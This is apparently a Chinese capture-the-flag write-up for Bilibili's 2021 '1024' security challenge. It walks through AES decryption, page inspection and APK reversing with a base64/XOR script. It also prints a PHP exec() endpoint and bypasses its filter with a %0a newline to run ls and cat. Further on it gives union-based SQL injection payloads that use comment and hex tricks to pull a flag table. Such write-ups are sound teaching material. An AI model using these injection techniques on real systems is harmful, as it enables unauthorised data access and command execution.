赛题地址:https://www.bilibili.com/blackboard/20211024.html

image-20211025210203813

题目1

image-20211025210336274

AES解密,密码:happy_1024_2233,密文是底下两行字符,需拼成一行(一开始确实没想到是这样!)

在线解密网站:http://tool.chacuo.net/cryptaes

image-20211025210933655

题目2

image-20211025211100089

F12,一番寻找下在home.vue中找到藏着的flag

image-20211025211529510

题目3

image-20211025211611168

下载压缩包,解压后得到eval.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
    /* 
        bilibili- ( ゜- ゜)つロ 乾杯~
        uat: http://192.168.3.2/uat/eval.php
        pro: http://security.bilibili.com/sec1024/q/pro/eval.php
    */
    $args = @$_GET['args'];
    if (count($args) >3) {
        exit();
    }
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) ) {
            exit();
        }
    }
    // todo: other filter
    $cmd = "/bin/2233 " . implode(" ", $args);
    exec($cmd, $out);
    for ($i=0; $i<count($out); $i++){
        echo($out[$i]);
        echo('<br>');
    }
?>

大致思路是由args参数传入命令来找出flag,args数组元素限制在3个以内,且正则匹配/^\w+$/过滤掉了像/.、这样的特殊字符,args还拼接了/bin/2233,直接传入命令无法正常执行,这个可以用结尾接换行符%0a来绕过,然后就能执行命令了。

ls 查看当前目录下的文件

image-20211025213016011

cat passwd 得到flag

image-20211025213132975

题目4

image-20211025213302057

地址和题目2一样,不过没啥思路。后来得到提示是sql注入,再次F12下找到一个api接口,是以POST提交日志信息的一些参数。

image-20211025214345208

user_name处存在注入点,过滤了空格。

获取库名,q

1
2
3
4
5
6
7
{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,database()",
    "action": "",
    "page": 1,
    "size": 20
}

image-20211025215337254

获取表名,flag,log,user

1
2
3
4
5
6
7
{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()",
    "action": "",
    "page": 1,
    "size": 20
}

image-20211025215534341

获取字段名,id(这里不能使用引号,不然就提前闭合导致错误,可以使用十六进制绕过,flag的十六进制为666c6167,前面加上0x)

1
2
3
4
5
6
7
{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167",
    "action": "",
    "page": 1,
    "size": 20
}

image-20211025220140526

最后一步,获取flag

1
2
3
4
5
6
7
{
    "user_id": "",
    "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(id)/**/from/**/flag",
    "action": "",
    "page": 1,
    "size": 20
}

image-20211025220407643

题目5

image-20211025222221427

下载test.apk,输入账户名和密码提交后提示“还差一点点~~”

image-20211025222638203

那是不是输入对了就给flag?逐渐忘记题目,这题考的是逆向分析啊~

以下参考其他师傅解法:

JADX打开

image-20211025223158463

Encrypt是加密过程,MainActivity里的两串字符,拿去按Encrypt里的反向操作一次即可。即:一次base64解码,一次异或3,两串可合成一串flag

解题脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import base64
 
obyteArray = [0x59, 0x57, 0x42, 0x6c, 0x4f, 0x6d, 0x5a, 0x6e, 0x4e, 0x6a, 0x41, 0x75, 0x4f, 0x6d, 0x4a, 0x6d, 0x4e,
              0x7a,
              0x41, 0x78, 0x4f, 0x32, 0x59, 0x3d]
 
code = [0x4e, 0x6a, 0x49, 0x31, 0x4f, 0x7a, 0x41, 0x33, 0x59, 0x47, 0x41, 0x75, 0x4e, 0x6a, 0x4e, 0x6d, 0x4e, 0x7a,
        0x63, 0x37, 0x59, 0x6d, 0x55, 0x3d]
 
user = ""
 
password = ""
 
for i in range(24):
    user+=chr(obyteArray[i])
    password+=chr(code[i])
 
print(base64.b64decode(user))
print(base64.b64decode(password))
 
a1 = str(base64.b64decode(user),encoding="utf-8")
a2 = str(base64.b64decode(password),encoding="utf-8")
 
ans=""
ans1=""
for i1 in range(17):
    p=ord(a1[i1])^3
    ans+=chr(p)
    p1=ord(a2[i1])^3
    ans1+=chr(p1)
 
print(ans)
print(ans1)

题目6

可参考:https://www.52pojie.cn/thread-1532604-1-1.html

题目7

image-20211025223534796

日志分析,需要找出所有的恶意IP,部分答案如下:

jj.bdc.bbb.cc,dc.bb.ii.jj,cde.ced.bbb.dd,cdd.bcc.bg.bib,cd.bb.cai.cbh,cd.baf.cae.cbc,bfh.ff.dj.jf,bfh.ff.dj.ig,bfh.ff.dj.fb,bfh.ff.dj.bd,bfh.ff.dj.bcf,bbb.bb.bjd.bhf,bbb.bb.bjd.bhc,bbb.bb.bjd.bha,bbb.bb.bjd.bgc,bba.ja.ccb.cbc,bba.ja.cca.beg